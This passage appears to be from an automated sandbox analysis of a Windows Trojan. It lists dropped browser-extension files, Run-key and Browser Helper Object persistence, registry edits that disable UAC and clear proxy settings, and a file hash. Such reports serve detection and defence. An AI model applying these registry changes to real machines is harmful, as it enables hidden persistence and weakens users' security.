C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\60166\7zxr.dll (0 bytes)

The process guide.exe:672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (8273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\cupdate.dat (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\icon.gif (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\verified_contents.json (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\7zxr.dll (18123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.js (772 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\res\crx.png (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\res\crx.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\_locales\en\messages.json (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_locales\zh_CN\messages.json (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\popup.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_create\_metadata\computed_hashes.json (1060 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_remove\background.html (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\jyrl\config\rili.ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\jychromeex_update\background.html (230 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jySougou.sext (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\360se6\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5fd22\7zxr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\360chrome\Chrome\User Data\Default\Extensions\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\messages.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\calmath.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\crx.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\computed_hashes.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\sec_setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\popup.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\icon.gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\verified_contents.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\messages.json (0 bytes)

Registry activity

The process HC188.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASMANCS]
"FileDirectory" = "%windir%\tracing"

"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\HC188_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process src2011.tmp:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "74 01 00 00 4B 8D 29 6F B2 6A D2 01"
"RegFilesHash" = "67 1F 22 64 AA 08 EA DB D1 1A E6 49 12 21 45 1A"
"RegFiles0000" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\fixfunction.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\guide.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\istask.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyrili.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jywebHelper.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RIBridage.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView64.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\chromerl.exe, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll, C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll"
"SessionHash" = "92 2F 1A C9 3B 82 C2 3F CC 5E 49 15 8E E2 B4 32"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

The process bFuAq.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\Windows\tAzJsX\bFuAq.exe"

The process 1819.exe:3564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"wshext.dll,-4511" = "Open &with Command Prompt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process rundll32.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\GameUX\ServiceLocation]
"Games" = "https://games.metaservices.microsoft.com/games/SGamesWebService.asmx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\GameUX]
"OOBGameInstalled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}]
"Description" = "Steam: Dark Messiah Might and Magic :Single Playerâ„¢"

"ApplicationId" = "{29dfdaf6-2655-4d7d-9dae-112ce811cf33}"
"ConfigGDFBinaryPath" = "C:\Windows\system32\GameUXLegacyGDFs.dll"
"ConfigApplicationPath" = "C:\Windows"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD]
"Blob" = "0F 00 00 00 01 00 00 00 20 00 00 00 52 29 BA 15"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\S-1-5-21-732923889-1296844034-1208581001-1000\{98A0A23D-0A5F-4D35-9D4A-DAF2B7F0CF43}]
"AppExePath" = "C:\Windows\mm.exe"
"ConfigInstallType" = "3"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"D69B561148F01C77C54578C10926DF5B856976AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process mm.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"otqvyruekg.exe" = "C:\Windows\WindowsUpdate\otqvyruekg.exe"

The process regsvr32.exe:2260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\TypeLib]
"(Default)" = "{9F170339-3C7C-488A-AE2F-9B2349D522DE}"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0]
"(Default)" = "NoteWebHeplerLib"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\InprocServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.dll"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}]
"(Default)" = "IRLExtension"

[HKCR\TypeLib\{9F170339-3C7C-488A-AE2F-9B2349D522DE}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}]
"(Default)" = "ÈÕÀúÄ£¿éÖúÊÖ"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\TypeLib]
"(Default)" = "{9F170339-3C7C-488A-AE2F-9B2349D522DE}"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\Version]
"(Default)" = "1.0"

[HKCR\Interface\{ED66AA37-E2D8-4C05-933A-2691F2847A18}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{345E24CA-D936-48F3-992A-BF0071EBBCD0}\InprocServer32]
"ThreadingModel" = "Apartment"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{345E24CA-D936-48F3-992A-BF0071EBBCD0}]
"(Default)" = "ÈÕÀúÄ£¿éÖúÊÖ"

"NoExplorer" = "1"

The process %original file name%.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process guide.exe:2532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}]
"AppName" = "RIBridage.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{157053CE-EAFA-4823-BFE2-7D5F37A07C24}]
"AppPath" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\"

[HKCU\Software\calendarj\val]
"UID" = "8f8c470902831287fd8ff759df1090d8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"URLInfoAbout" = "www.jyrili.com"
"Publisher" = ""

[HKCU\Software\calendarj\val]
"Count" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}]
"AppPath" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{157053CE-EAFA-4823-BFE2-7D5F37A07C24}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"DisplayVersion" = "4.0.3.0"
"DisplayName" = "简约日历"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9B6C2D26-30D5-4711-BD8C-520D8ED70FDF}]
"Policy" = "3"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\uninst.exe"

[HKLM\SOFTWARE\MozillaPlugins\@jyrili.com/yzwebAssist]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jywebHelper.dll"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\calendarj\val]
"Src" = "2011"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\简约日历]
"DisplayIcon" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyrili.exe"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B61A7628-1390-433A-A852-601F4A15A28D}]
"Policy" = "3"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B61A7628-1390-433A-A852-601F4A15A28D}]
"AppPath" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{157053CE-EAFA-4823-BFE2-7D5F37A07C24}]
"AppName" = "jyrili.exe"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B61A7628-1390-433A-A852-601F4A15A28D}]
"AppName" = "update.exe"

The process guide.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = ""

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Explorer\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"
"Version" = "4.0.3"

[HKCU\Software\Google\Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

[HKCU\Software\UCBrowser\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Version" = "4.0.3"

[HKCU\Software\2345Chrome\Extensions\hohonaplgfolmdaaafoddgbiakognoal]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\jychromeex.crx"

The process otqvyruekg.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
"PromptOnSecureDesktop" = "0"

Dropped PE files

MD5 File path
3e733861cf8347465a0c4e0be2d4b521 c:\Program Files\HC188.exe
